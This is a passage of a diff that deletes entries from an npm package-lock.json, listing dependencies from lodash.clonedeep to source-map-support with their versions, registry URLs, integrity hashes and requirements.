"https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz", - "integrity": "sha1-4j8/nE+Pvd6HJSnBBxhXoIblzO8=", - "dev": true, - "peer": true - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "lodash.merge": { - "version": "4.6.2", - "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", - "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", - "dev": true, - "peer": true - }, - "lodash.truncate": { - "version": "4.4.2", - "resolved": "https://registry.npmjs.org/lodash.truncate/-/lodash.truncate-4.4.2.tgz", - "integrity": "sha1-WjUNoLERO4N+z//VgSy+WNbq4ZM=", - "dev": true, - "peer": true - }, - "make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "requires": { - "semver": "^7.5.3" - } - }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", - "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", - "dev": true, - "requires": { - "braces": "^3.0.3", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.0.tgz", - "integrity": "sha512-oGZRv2OT1lO2UF1zUcwdTb3wqUwI0kBGTgt/T7OdSj6M6N5m3o5uPf0AIW6lVxGGoiWUR7e2AwTE+xiwK8WQig==" - }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "requires": { - "balanced-match": "^1.0.0" - } - }, - "glob": { - "version": "10.3.12", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.3.12.tgz", - "integrity": "sha512-TCNv8vJ+xz4QiqTpfOJA7HvYv+tNIRHKfUWw/q+v2jdgN4ebz+KY9tGx5J4rHP0o84mNP+ApH66HRX8us3Khqg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^2.3.6", - "minimatch": "^9.0.1", - "minipass": "^7.0.4", - "path-scurry": "^1.10.2" - } - }, - "minimatch": { - "version": "9.0.4", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.4.tgz", - "integrity": "sha512-KqWh+VchfxcMNRAJjj2tnsSJdNbHsVgnkBhTNrW7AjVo6OvLtxw8zfT9oLw1JSohlFzJ8jCoTgaoXvJ+kHt6fw==", - "requires": { - "brace-expansion": "^2.0.1" - } - }, - "rimraf": { - "version": "5.0.5", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.5.tgz", - "integrity": "sha512-CqDakW+hMe/Bz202FPEymy68P+G50RfMQK+Qo5YUqc9SPipvbGjCGKd0RSKEelbsfQuw3g5NZDSrlZZAJurH1A==", - "requires": { - "glob": "^10.3.7" - } - } - } - }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha1-Sr6/7tdUHywnrPspvbvRXI1bpPc=", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.14", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.14.tgz", - "integrity": "sha512-y10wOWt8yZpqXmOgRo77WaHEmhYQYGNA6y421PKsKYWEK8aW+cqAphborZDhqfyKrbZEN92CN1X2KbafY2s7Yw==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "oauth4webapi": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.2.tgz", - "integrity": "sha512-KQZkNU+xn02lWrFu5Vjqg9E81yPtDSxUZorRHlLWVoojD+H/0GFbH59kcnz5Thdjj7c4/mYMBPj/mhvGe/kKXA==", - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha1-WDsap3WWHUsROsF9nFC6753Xa9E=", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "requires": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - } - }, - "optionator": { - "version": "0.9.1", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.1.tgz", - "integrity": "sha512-74RlY5FCnhq4jRxVUPKDaRwrVNXMqsGsiW6AJw4XK8hmtm10wC0ypZBLw5IIp85NZMr91+qd1RvvENwg7jjRFw==", - "dev": true, - "peer": true, - "requires": { - "deep-is": "^0.1.3", - "fast-levenshtein": "^2.0.6", - "levn": "^0.4.1", - "prelude-ls": "^1.2.1", - "type-check": "^0.4.0", - "word-wrap": "^1.2.3" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parent-module": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", - "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", - "dev": true, - "requires": { - "callsites": "^3.0.0" - } - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "path-scurry": { - "version": "1.10.2", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.10.2.tgz", - "integrity": "sha512-7xTavNy5RQXnsjANvVvMkEjvloOinkAjv/Z6Ildz9v2RinZ4SBKTWFOVRbaF8p0vpHnyjV/UwNDdKuUv6M5qcA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "dependencies": { - "lru-cache": { - "version": "10.2.2", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.2.2.tgz", - "integrity": "sha512-9hp3Vp2/hFQUiIwKo8XCeFVnrg8Pk3TYNPIR7tJADKi5YfcF7vEaK7avFHTlSy3kOKYaJQaalfEo6YuXdceBOQ==" - } - } - }, - "path-type": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", - "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "prelude-ls": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", - "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", - "dev": true, - "peer": true - }, - "prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", - "dev": true - }, - "pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "progress": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.3.tgz", - "integrity": "sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA==", - "dev": true, - "peer": true - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==" - }, - "pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "regexpp": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/regexpp/-/regexpp-3.2.0.tgz", - "integrity": "sha512-pq2bWo9mVD43nbts2wGv17XLiNLya+GklZ8kaDLV2Z08gDCsGpnKn9BFMepvWuHCbyVvY7J5o5+BVvoQbmlJLg==", - "dev": true, - "peer": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "require-from-string": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", - "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", - "dev": true, - "peer": true - }, - "resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "requires": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - }, - "dependencies": { - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - } - } - }, - "resolve-from": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", - "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "rfc4648": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.3.tgz", - "integrity": "sha512-MjOWxM065+WswwnmNONOT+bD1nXzY9Km6u3kzvnx8F8/HXGZdz3T6e6vZJ8Q/RIMUSp/nxqjH3GwvJDy8ijeQQ==" - }, - "rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dev": true, - "peer": true, - "requires": { - "glob": "^7.1.3" - } - }, - "safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "slice-ansi": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", - "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", - "dev": true, - "peer": true, - "requires": { - "ansi-styles": "^4.0.0", - "astral-regex": "^2.0.0", - "is-fullwidth-code-point": "^3.0.0" - } - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": 